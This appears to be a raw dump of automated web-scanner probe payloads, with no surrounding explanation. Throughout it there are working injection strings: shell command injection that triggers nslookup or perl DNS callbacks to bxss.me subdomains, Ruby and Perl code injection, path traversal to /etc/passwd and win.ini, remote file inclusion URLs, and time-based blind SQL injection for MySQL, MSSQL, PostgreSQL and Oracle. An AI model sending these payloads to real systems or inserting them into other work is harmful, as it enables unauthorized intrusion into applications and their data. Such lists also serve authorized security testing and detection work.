HttP://bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(118).concat(73).concat(106).concat(84)+(require"socket"
Socket.gethostbyname("hitoj"+"kvzwyxdk8eb07.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(114).concat(70).concat(101).concat(70)+(require'socket'
Socket.gethostbyname('hitdp'+'gtturhcd71957.bxss.me.')[3].to_s)+'
12345'"\'\");|]*%00{%0d%0a%bf%27'💡
response.write(9676047*9056709)
'+response.write(9676047*9056709)+'
"+response.write(9676047*9056709)+"
../../../../../../../../../../etc/passwd
../../../../../../../../../../windows/win.ini
echo brtarj$()\ msaxer\nz^xyu||a #' &echo brtarj$()\ msaxer\nz^xyu||a #|" &echo brtarj$()\ msaxer\nz^xyu||a #
&echo eqdlwf$()\ oxckmh\nz^xyu||a #' &echo eqdlwf$()\ oxckmh\nz^xyu||a #|" &echo eqdlwf$()\ oxckmh\nz^xyu||a #
|echo bpkvsz$()\ kvidxc\nz^xyu||a #' |echo bpkvsz$()\ kvidxc\nz^xyu||a #|" |echo bpkvsz$()\ kvidxc\nz^xyu||a #
(nslookup hitdsrhtzmnsud04d1.bxss.me||perl -e "gethostbyname('hitdsrhtzmnsud04d1.bxss.me')")
$(nslookup hitipylkiqxcc031e3.bxss.me||perl -e "gethostbyname('hitipylkiqxcc031e3.bxss.me')")
&(nslookup hitoonpijlbuke7235.bxss.me||perl -e "gethostbyname('hitoonpijlbuke7235.bxss.me')")&'\"`0&(nslookup hitoonpijlbuke7235.bxss.me||perl -e "gethostbyname('hitoonpijlbuke7235.bxss.me')")&`'
|(nslookup hitrpeblesgef159bf.bxss.me||perl -e "gethostbyname('hitrpeblesgef159bf.bxss.me')")
`(nslookup hitldbutsxnpqb1921.bxss.me||perl -e "gethostbyname('hitldbutsxnpqb1921.bxss.me')")`
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
;(nslookup hitdzkmprayeob9af1.bxss.me||perl -e "gethostbyname('hitdzkmprayeob9af1.bxss.me')")|(nslookup hitdzkmprayeob9af1.bxss.me||perl -e "gethostbyname('hitdzkmprayeob9af1.bxss.me')")&(nslookup hitdzkmprayeob9af1.bxss.me||perl -e "gethostbyname('hitdzkmprayeob9af1.bxss.me')")
1some_inexistent_file_with_long_name%00.jpg
http://bxss.me/t/fit.txt%3F.jpg
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
'.gethostbyname(lc('hitsi'.'fccllcxv5b156.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(77).chr(116).chr(79).'
".gethostbyname(lc("hitsf"."voktwubbb4ea8.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(71).chr(113).chr(90)."
-1 OR 2+635-635-1=0+0+0+1 --
-1 OR 2+169-169-1=0+0+0+1
-1' OR 2+741-741-1=0+0+0+1 --
-1' OR 2+685-685-1=0+0+0+1 or 'EhKSDLfi'='
-1" OR 2+477-477-1=0+0+0+1 --
if(now()=sysdate(),sleep(12),0)
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z
(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/
-1; waitfor delay '0:0:12' --
-1); waitfor delay '0:0:12' --
1 waitfor delay '0:0:12' --
p0Fj3qIf'; waitfor delay '0:0:12' --
-5 OR 40=(SELECT 40 FROM PG_SLEEP(12))--
-5) OR 363=(SELECT 363 FROM PG_SLEEP(12))--
-1)) OR 823=(SELECT 823 FROM PG_SLEEP(12))--
WrmoQ1S7' OR 257=(SELECT 257 FROM PG_SLEEP(12))--
Kpc2Y1LR') OR 27=(SELECT 27 FROM PG_SLEEP(12))--
0iu02ofs')) OR 870=(SELECT 870 FROM PG_SLEEP(12))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),12)
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),12)||'